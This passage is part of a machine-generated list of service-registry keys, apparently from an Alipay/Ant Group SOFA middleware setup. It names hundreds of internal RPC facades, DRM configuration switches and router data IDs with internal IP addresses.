payment.PaymentColumnFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scsupport.common.service.facade.backstage.ssm.SeasonRankFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.strategy.SmartAntFinStrategyCalcFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkassetmore.common.service.facade.api.LiquidPlnServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.176.134#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.112.86#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","pubbuservice@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.charge:name=com.alipay.cif.client.drm.CustomerTagSwitcher.customerTagGroupNames,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.infosec.biz.manager.drm.InfosecmngSharedResource.fullUpdateSharedResource,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.5.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.peerpayprod.senior.common.service.facade.family.api.FamilyMemberQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.ctuevent.IntlEventReviewTaskQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clivecenter.common.service.facade.api.ClcConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.common.manage.facade.api.solution.XcodeProcessorListQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:finpromoscene@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.impl.support.drm.LpAdminDrm.queryCreditNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundmng.biz.ext.interest.service.InterestFileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.config.center.ServiceDeployQueryService:1.0:offline_stable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontent.common.service.facade.api.shopprofile.ShopProfileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdeduct.common.service.facade.agreement.PayAuthSpiFacade:1.0:mobilecodec@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmCommonRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:uniqueId1111@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.message.service.MessageTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.AbTestSolutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.orchestration.handler.RemoteActionHandler:1.0:sitebuilder-test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.252.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoprod.biz.promo.assist.rpc.MenuQueryRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.ExtPropsRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.common.core.client.AppInvokeService:1.0:aliinvoiceprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfas.core.service.api.InwardConsultProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.cgtemplate.ConditionGroupTemplateConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.CardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbreservationprod.common.service.facade.category.ReservationCategoryTypeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:tallycore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.messagebox.MessageBoxQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartsql.service.facade.service.SystemService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antlegalchain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpay.prod.common.service.facade.api.account.JointAccountNotifyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:appstoreTaskPackPointCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.InvestAnnualBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mychain.dl.facade.PfFinSubjectQueryFacade:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:definpfprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.123.160#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.abilitycore.common.service.facade.std.AbilityConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cifprocess.directory.DirectoryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.product.GiftRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.live.api.LiveContentAdminFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipromofront.common.service.facade.service.rpc.promokernel.CampaignTriggerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.NearDataTairRouterSwitcher.modelBlackConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.CifInnerAckCodeTairService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpensionprod.common.service.facade.fusion.PensionFusionDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:mbillexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.service.DeviceAuthInfoService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.tenant.CapDataSourceService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.TwoPhaseMcardManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.ProjectDeliverFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.partner.PartnerManageFacade:1.0:mapitool@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.158.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antmember.common.service.facade.BenefitConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.policysearch.api.QuickClaimServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:dcepprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insiop.common.service.facade.dsapi.InsIopDsApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.drm.SlaveQueryDrm.starWishAuthSingleValidate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifemsgprod.common.service.facade.marketing.MsgMarketingBizCustomizeService:1.0:messageRateRenderProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.HospitalQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.chargeGzoneTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","flow-control-channel/default/broker-channel#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.52.101.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.147.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insmobile:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:membertangram@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.BankLogManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.vtask.TaskSignUpQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.spec.SdkSpecConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.gfcenter.common.service.facade.ArCollectReceiptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.pdcore.common.service.facade.ProductSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.fcbuservice.common.service.facade.OrganizationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlinkdata.common.service.facade.account.signaccount.service.InstAccountInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.HeatDrmResource.receiveMessage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.airbops:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.exratecenter.service.facade.api.ExClientSubAgreQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.cashing.service.CashingProductPublishFailService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecisioncarina.service.client.playback.publish.CarinaTrProxyFacade:1.0:assetfluxdcsmirror@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insrenewprod.common.service.facade.api.renewal.InsRenewalInsureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCLOANAPPLY#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmarketingcore.common.service.facade.redemption.RedemptionVoucherInstanceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ApInvoiceContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.revol.drm.tenant.cifperm.perfUpperMillsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:ucrcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.188.67#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alphaq.common.facade.label.api.IRefineFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paymentmng.service.facade.paycore.PmtDbkStyCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.cdecision.label.facade.precheck.GenericBeanPreCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aclinkedcore.common.service.facade.JobService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscharity.common.service.facade.mng.InsCharityInsureBatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodtrans.senior.manage.facade.ProdBlackManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipss.service.facade.api.operation.IpssOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.213.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.39.178.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.koubei.kbposmng.common.service.facade.api.DeviceManagementOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opencore.service.facade.template.TemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.routeclient.interfacename:alipassprod#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilelbs.common.service.facade.merchant.MerchantLocationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:clearingcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csmonitor.common.service.facade.training.ChTrainingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.120.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.157.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.fraudmng:name=com.alipay.zmodel.core.evaluator.config.ZModelCoreEvaluatorResource.modelDomainConfigurations,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.yebplus.common.facade.service.api.YebsLiquidityControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.OssFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.45.128.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.paymentmng.service.facade.paycore.PmtTmTransCodeCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:findefencecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.24.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.overseacommon.common.dynamic2.spi.service.Dynamic2ConfigService:1.0:apshopcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FOREXPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fiscore.common.service.facade.callback.FiscoreCallBackService:1.0:merchantsettle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundmng.common.service.facade.FundFileService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datariskmarket.facade.RmChangeEventDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepromo.common.service.facade.coupon.CouponMsgService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.fininfo.finextSequenceDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.cloud.opsware.api.facade.ops.OpsPlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.rccenter.common.service.facade.RcHgRiskExposureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:finfundcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.shortlink.MobileShortLinkFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.normalExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.insmobile:name=com.alipay.insmobile.biz.workorder.drm.InsWorkorderDRM.pendingEvaCardPeriod,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:1111@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:minitrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmarketingprod.common.service.facade.insmarketingapp.TransVoucherAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instportalmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tsm.common.service.facade.rpc.v2.spi.TsmServiceV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pointprod.common.service.activity.api.ActivityThemeFacadeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.DrmForCommonManageResource.addpWeakDependencyBiz,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cicada.common.service.facade.api.service.ServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_RQ_Notify_3#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbshopdetail.facade.ShopBrandFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PMSCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:bstsolprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.19.30.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.customscenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dk.common.service.facade.monitor.TaskGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.huoyan.itemcore.ItemcoreServiceCacheCheckCompoment:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.FundAnnouncementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.necquery.common.service.repay.RepayPlanQueryNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.225#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instdatalink.common.service.facade.data.DataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smcp.facade.securityexplore.AeThemeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_TESTT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchportalcore.common.service.link.facade.ChatFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoorder.common.service.facade.api.PromoTeamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.flowctrl6014#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.secucommunity.speech.api.crowd.CrowdInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.AbScenarioFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.changerequirement.facade.api.ChangeIterationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pointprod.commom.manage.facade.secretcard.api.SecretCardSmsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.211.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.160.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dmeta.facade.property.BusinessPropertyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.midas:name=com.alipay.zcache.log.midas.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.common.schedule.thread.LoanRepayPay.maxPoolSize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.23.236.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbadvert.common.service.facade.api.MerchantItemSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityDonateBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FinBusinessSumFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.customscenter.biz.declare.drm.CommonConfig.declarePayerConsistencyPids,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.quotstore.api.FalconQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.escrowexprod.common.service.facade.EscrowExtServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:insttrade@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:airprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_AML#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixContains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.application:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestcore.service.api.lendpof.LoanApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantAccountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:securityassistant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.dwebupload.client.drm.DomainConfig.uploadTarget,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.80.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:finresprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_HSF_CALLBACK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.253.211#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.syncStatParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.72.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imobile.foundation.framework.support.service.FoundationExtPointAdapterService:1.0:WALLET_MOCK@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.achelmetcore.common.service.facade.SecurityPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_forwardNextEnvProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.common.service.facade.fund.FundRuleRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opscloudcore.common.service.facade.risk.ChangeRiskLevelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.icardcenter.service.facade.api.query.UnbindCardQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointprod.common.service.ump.api.ActivityPointService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.erecon.common.service.facade.download.api.ErcItemQueryDownLoadService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkopermng_modelStrategyAduitProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.anna.service.AnnaAssetQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.notify.ExterfaceNotifyManageFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscsalipay.common.service.facade.model.ApplyUnifiedModelFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.cds.mng.ProductThresholdFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secdatacontext.common.facade.spi.AssetsMetaAccessSpi:1.0:velocityDimen@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:PromoPlatform_malgo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antforest_mrch_task_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.edeductcenter.common.service.facade.EdeductCycleTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.apshopcenter.common.service.facade.LabelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashier.common.service.facade.payorder.api.PayOrderManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.updateUserEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mcomment.biz.cpc.rpc.SocialCirclePBService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fascore.biz.service.cashier.CashierLocalService:1.0@DEFAULT#@#DEFAULT_INSTANCE_